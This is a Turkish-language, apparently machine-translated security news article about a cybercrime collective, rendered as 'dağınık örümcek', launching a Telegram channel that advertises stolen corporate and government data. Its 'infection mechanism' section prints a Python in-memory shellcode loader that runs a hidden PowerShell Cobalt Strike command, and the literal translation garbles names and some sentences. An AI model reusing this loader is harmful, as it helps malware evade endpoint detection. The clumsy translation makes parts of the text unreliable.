Ağustos 2025’in başlarında, dağınık örümcek olarak bilinen daha önce sessiz bir siber suç kolektifi, müdahale ve veri açığa çıkma işlemlerinin kanıtını toplayan çarpıcı yeni bir telgraf kanalı ile yeniden ortaya çıktı.
Kanal adı, birkaç üretken gasp grubu arasında bir işbirliğine – veya en azından ortak bir markayı – işaret eden Shinyhunters, Dağınık Örümcek ve Lapsus $ kaynağını kaynaştırıyor.
Channel, lansmanından sonraki birkaç saat içinde Victoria’s Secret’a konsol erişiminin ekran görüntüleri, Gucci’den 100 girişli bir müşteri veri örneği ve Neiman Marcus ve Chanel’den satılabilir veritabanlarının listelerini yayınladı.
Databreaches analistleri, bu birleşmiş kanalın, çalıntı kimlik bilgileri ve kurumsal belgeler için basit sızıntı duyurularının ötesinde neredeyse gerçek zamanlı bir pazara dönüştüğünü kaydetti.
Dağınık Spider’ın çoklu fidye yazılımı ve veri hırsızlığı kampanyalarının halka açık bir toplayıcısı olarak ortaya çıkması, daha önceki, daha gizli operasyonlarından ayrılıyor.
Tarihsel olarak, sızıntı kanalları tek bir ifade ve ardından bir indirme bağlantısı veya satış talimatları yayınlayacaktır. Buna karşılık, yeni kanal kısmi veri dökümleri, “İlgileniyorsa HMU” satış sahaları, memler ve İngiltere Adalet Bakanlığı gibi kuruluşlara doğrudan tehditler.
Databreaches araştırmacıları, GHithub depolarını hukuki yardım ajansına ait Github depolarını numaralandırmak için gönderilen senaryoları belirlediler.
.webp)
Bu kanıt ve propaganda karışımı hem şeffaflık hem de terör duygusu yaratır.
Kanalın hızlı vahiyleri, endüstriler arasında anında alarm verdi. Disney, S&P Global, T-Mobile, Nvidia, Otelier, Coinbase, Burger King Brezilya, Adidas ve Cisco dahil olmak üzere yüksek değerli hedefler, bazı olayların daha önceki Snowflake ve Salesforce kampanya sızıntılarına bağlanmasıyla adlandırıldı.
Hükümet organları kaçmadı: ABD İç Güvenlik Bakanlığı, sunucuların dizin listelerini gösteren birden fazla yayında yer alırken, ekran görüntüleri çalınan mahkeme başvuruları ile ilgili müzakereleri ima etti.
.webp)
Kanalın çılgın temposu ve geniş kapsamı, dağınık örümceğin gasp kaldıraçını en üst düzeye çıkarmak için veri hırsızlığı operasyonlarını koordine ettiğini veya yeniden markalaşabileceğini düşündürmektedir.
Enfeksiyon mekanizması
Dağınık örümcek enfeksiyon mekanizması, mızrak aktı ve sömürülen VPN kimlik bilgilerinden başlayarak çok aşamalı bir yaklaşımdan yararlanır.
İlk erişim komut dosyaları – gizlenmiş Python snippet’lerinde paylaşılır – kobalt grev işaretlerinin konuşlandırılmasını otomatikleştirin.
Tipik bir snippet, diske yazmadan kabuk kodunu şifresini çözen ve belleğe enjekte eden özel bir yükleyici kullanımını ortaya çıkardı:-
import ctypes, base64, subprocess
shellcode = base64.b64decode("...==")
ptr = ctypes.windll.kernel32.VirtualAlloc(None, len(shellcode), 0x3000, 0x40)
ctypes.memmove(ptr, shellcode, len(shellcode))
ctypes.windll.kernel32.CreateThread(None, 0, ptr, None, 0, None)
subprocess.call(["powershell", "-nop", "-w", "hidden", "-c", "Invoke-CobaltStrike"])Bu bellek içi yürütme, geleneksel antivirüs tarayıcılarından ve uç nokta algılama araçlarından kaçar.
Beacon aktif olduğunda, dağınık örümcek, fidye yazılımı dağıtmadan veya 48 saatlik başlangıç erişimiyle satışları sunmadan önce bilinen Windows çekirdeği güvenlik açıkları aracılığıyla ayrıcalıkları artırır.
SOC’nizi en son tehdit verilerine tam erişimle donatın Herhangi biri. Olay yanıtı iyileştirebilir -> 14 günlük ücretsiz deneme alın